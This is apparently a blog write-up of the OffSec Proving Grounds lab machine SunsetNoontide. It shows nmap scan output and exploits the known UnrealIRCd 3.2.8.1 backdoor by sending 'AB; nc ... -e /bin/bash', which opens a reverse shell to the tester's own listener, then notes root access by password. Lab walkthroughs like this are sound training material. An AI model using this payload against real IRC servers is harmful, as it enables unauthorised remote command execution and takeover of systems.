| title | layout | date | tag | writeups | hidden | author | description | ||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Proving grounds Play: SunsetNoontide |
post |
2023-09-11 01:00 |
|
true |
true |
Naveen |
Offsec proving grounds play linux machine writeup |
PORT STATE SERVICE VERSION
6667/tcp open irc UnrealIRCd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.foonet.com
| version: Unreal3.2.8.1. irc.foonet.com
| uptime: 205 days, 6:52:38
| source ident: nmap
| source host: 46E8C50E.C2311716.EA8777A3.IP
|_ error: Closing Link: aguqweprx[192.168.45.209] (Quit: aguqweprx)
Service Info: Host: irc.foonet.com6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd (Admin email [email protected])The Unreal3.2.8.1. irc.foonet.com is vulnerable to remote code execution. The simple way to exploit the vulnerability is to send OS commands follwed by the AB; string.
Connect to the PORT using netcat. Make sure to run netcat listener on PORT 1234.
# connect to PORT
nc -nv $IP 6667
# send payload after connection
AB; nc 192.168.45.209 1234 -e /bin/bashInitial Foothold Obtained
Download and run linPEAS.
The results shows the root user access can be obtained by switching to root using password as root.
Thanks for reading!
For more insights and updates, follow me on Twitter: @thevillagehacker.